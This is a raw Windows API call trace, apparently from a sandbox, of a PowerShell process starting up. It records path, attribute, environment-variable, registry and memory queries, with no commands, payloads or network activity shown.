	[0323.201] CoTaskMemFree (pv=0xf9420) 
	[0323.202] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cec8a0*="Certificate", lpRawData=0x2cec630) returned 1
	[0323.517] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0323.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.517] CoTaskMemFree (pv=0xed0a0) 
	[0323.521] GetLogicalDrives () returned 0x4
	[0323.521] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.521] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0323.522] CoTaskMemAlloc (cb=0x20e) returned 0x148560
	[0323.522] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x148560 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0323.522] CoTaskMemFree (pv=0x148560) 
	[0323.523] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0323.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.523] CoTaskMemFree (pv=0xed0a0) 
	[0323.524] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0323.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.524] CoTaskMemFree (pv=0xed0a0) 
	[0323.533] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0323.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.534] CoTaskMemFree (pv=0xed0a0) 
	[0323.535] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0323.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.535] CoTaskMemFree (pv=0xed0a0) 
	[0323.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.536] SetErrorMode (uMode=0x1) returned 0x1
	[0323.536] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28cf90 | out: lpFileInformation=0x28cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.536] SetErrorMode (uMode=0x1) returned 0x1
	[0323.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.536] SetErrorMode (uMode=0x1) returned 0x1
	[0323.536] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28cf90 | out: lpFileInformation=0x28cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.536] SetErrorMode (uMode=0x1) returned 0x1
	[0323.537] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0323.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0323.537] CoTaskMemFree (pv=0xed0a0) 
	[0323.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.542] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.542] SetErrorMode (uMode=0x1) returned 0x1
	[0323.543] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cf50 | out: lpFileInformation=0x28cf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0323.543] SetErrorMode (uMode=0x1) returned 0x1
	[0323.543] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.543] SetErrorMode (uMode=0x1) returned 0x1
	[0323.543] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x28cf50 | out: lpFileInformation=0x28cf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0323.543] SetErrorMode (uMode=0x1) returned 0x1
	[0323.543] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x28cd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.543] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x28cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.543] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.543] SetErrorMode (uMode=0x1) returned 0x1
	[0323.543] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28cf50 | out: lpFileInformation=0x28cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.544] SetErrorMode (uMode=0x1) returned 0x1
	[0323.544] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.544] SetErrorMode (uMode=0x1) returned 0x1
	[0323.544] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28cf50 | out: lpFileInformation=0x28cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.544] SetErrorMode (uMode=0x1) returned 0x1
	[0323.544] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.544] SetErrorMode (uMode=0x1) returned 0x1
	[0323.544] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28cf50 | out: lpFileInformation=0x28cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.545] SetErrorMode (uMode=0x1) returned 0x1
	[0323.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.545] SetErrorMode (uMode=0x1) returned 0x1
	[0323.545] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28cf50 | out: lpFileInformation=0x28cf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.545] SetErrorMode (uMode=0x1) returned 0x1
	[0323.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.545] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.545] SetErrorMode (uMode=0x1) returned 0x1
	[0323.546] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28cf90 | out: lpFileInformation=0x28cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.546] SetErrorMode (uMode=0x1) returned 0x1
	[0323.546] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.546] SetErrorMode (uMode=0x1) returned 0x1
	[0323.546] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28cf90 | out: lpFileInformation=0x28cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.546] SetErrorMode (uMode=0x1) returned 0x1
	[0323.546] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.546] SetErrorMode (uMode=0x1) returned 0x1
	[0323.546] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28cf90 | out: lpFileInformation=0x28cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.547] SetErrorMode (uMode=0x1) returned 0x1
	[0323.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.547] SetErrorMode (uMode=0x1) returned 0x1
	[0323.547] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28cf90 | out: lpFileInformation=0x28cf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.890] SetErrorMode (uMode=0x1) returned 0x1
	[0323.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.892] SetErrorMode (uMode=0x1) returned 0x1
	[0323.892] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d250 | out: lpFileInformation=0x28d250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.892] SetErrorMode (uMode=0x1) returned 0x1
	[0323.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.548] CoTaskMemAlloc (cb=0x804) returned 0x1b81bfd0
	[0324.548] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b81bfd0, nSize=0x28d5b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d5b8) returned 0x1
	[0324.548] CoTaskMemFree (pv=0x1b81bfd0) 
	[0324.548] CoTaskMemAlloc (cb=0x204) returned 0xf9420
	[0324.548] GetUserNameW (in: lpBuffer=0xf9420, pcbBuffer=0x28d5f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d5f8) returned 1
	[0324.548] CoTaskMemFree (pv=0xf9420) 
	[0324.549] ReportEventW (hEventLog=0x1b940008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d25588*="Available", lpRawData=0x2d25318) returned 1
	[0324.717] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.718] CoTaskMemFree (pv=0xed0a0) 
	[0324.718] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.718] CoTaskMemFree (pv=0xed0a0) 
	[0324.720] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.720] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0324.720] CoTaskMemFree (pv=0xed0a0) 
	[0324.720] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.720] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0324.720] CoTaskMemFree (pv=0xed0a0) 
	[0324.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d5d8 | out: phkResult=0x28d5d8*=0x398) returned 0x0
	[0324.721] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d55c, lpData=0x0, lpcbData=0x28d558*=0x0 | out: lpType=0x28d55c*=0x1, lpData=0x0, lpcbData=0x28d558*=0x56) returned 0x0
	[0324.721] CoTaskMemAlloc (cb=0x5a) returned 0x103130
	[0324.722] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28d52c, lpData=0x103130, lpcbData=0x28d528*=0x56 | out: lpType=0x28d52c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28d528*=0x56) returned 0x0
	[0324.722] CoTaskMemFree (pv=0x103130) 
	[0324.722] RegCloseKey (hKey=0x398) returned 0x0
	[0324.723] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.723] CoTaskMemFree (pv=0xed0a0) 
	[0324.752] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0324.752] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.752] CoTaskMemFree (pv=0xed0a0) 
	[0324.753] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0324.757] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.757] CoTaskMemFree (pv=0xed0a0) 
	[0324.757] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.757] CoTaskMemFree (pv=0xed0a0) 
	[0324.758] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.758] CoTaskMemFree (pv=0xed0a0) 
	[0324.759] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.759] CoTaskMemFree (pv=0xed0a0) 
	[0324.759] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.760] CoTaskMemFree (pv=0xed0a0) 
	[0324.760] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0324.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.760] CoTaskMemFree (pv=0xed0a0) 
	[0324.761] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0324.761] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0326.596] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0326.599] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0326.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.599] CoTaskMemFree (pv=0xed0a0) 
	[0327.505] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0xed4e0
	[0327.506] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0xed5f0
	[0328.977] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0329.640] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0329.642] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0329.642] VirtualQuery (in: lpAddress=0x28a080, lpBuffer=0x28af40, dwLength=0x30 | out: lpBuffer=0x28af40*(BaseAddress=0x28a000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.233] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.234] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.235] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.236] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0330.236] VirtualQuery (in: lpAddress=0x28b630, lpBuffer=0x28c4f0, dwLength=0x30 | out: lpBuffer=0x28c4f0*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
